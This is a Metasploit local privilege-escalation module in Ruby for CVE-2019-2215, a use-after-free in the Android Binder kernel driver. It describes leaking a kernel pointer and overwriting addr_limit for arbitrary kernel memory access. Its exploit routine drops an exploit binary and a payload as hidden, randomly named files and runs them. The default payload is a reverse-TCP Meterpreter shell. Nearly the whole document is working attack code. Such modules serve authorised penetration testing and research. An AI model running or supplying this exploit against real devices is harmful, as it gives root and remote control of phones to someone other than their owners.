Android Binder Use-After-Free Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Common
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => "Android Binder Use-After-Free Exploit",
          'Description' => %q{
            This module exploits CVE-2019-2215, which is a use-after-free in Binder in the
            Android kernel. The bug is a local privilege escalation vulnerability that
            allows for a full compromise of a vulnerable device. If chained with a browser
            renderer exploit, this bug could fully compromise a device through a malicious
            website.
            The freed memory is replaced with an iovec structure in order to leak a pointer
            to the task_struct. Finally the bug is triggered again in order to overwrite
            the addr_limit, making all memory (including kernel memory) accessible as part
            of the user-space memory range in our process and allowing arbitrary reading
            and writing of kernel memory.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Jann Horn', # discovery and exploit
            'Maddie Stone', # discovery and exploit
            'grant-h',      # Qu1ckR00t
            'timwr',        # metasploit module
          ],
          'References' => [
            [ 'CVE', '2019-2215' ],
            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1942' ],
            [ 'URL', 'https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html' ],
            [ 'URL', 'https://hernan.de/blog/2019/10/15/tailoring-cve-2019-2215-to-achieve-root/' ],
            [ 'URL', 'https://github.com/grant-h/qu1ckr00t/blob/master/native/poc.c' ],
          ],
          'DisclosureDate' => '2019-09-26',
          'SessionTypes' => [ 'meterpreter' ],
          'Platform' => [ "android", "linux" ],
          'Arch' => [ ARCH_AARCH64 ],
          'Targets' => [[ 'Auto', {} ]],
          'DefaultOptions' => {
            'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
            'WfsDelay' => 5,
          },
          'DefaultTarget' => 0,
          'Compat' => {
            'Meterpreter' => {
              'Commands' => %w[
                stdapi_fs_getwd
              ]
            }
          },
        }
      )
    )
  end

  def upload_and_chmodx(path, data)
    write_file path, data
    chmod(path)
    register_file_for_cleanup(path)
  end

  def exploit
    local_file = File.join(Msf::Config.data_directory, "exploits", "CVE-2019-2215", "exploit")
    exploit_data = File.read(local_file, mode: 'rb')

    workingdir = session.fs.dir.getwd
    exploit_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(exploit_file, exploit_data)
    payload_file = "#{workingdir}/.#{Rex::Text::rand_text_alpha_lower(5)}"
    upload_and_chmodx(payload_file, generate_payload_exe)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec("echo '#{payload_file} &' | #{exploit_file}")
    print_status("Exploit result:\n#{result}")
  end
end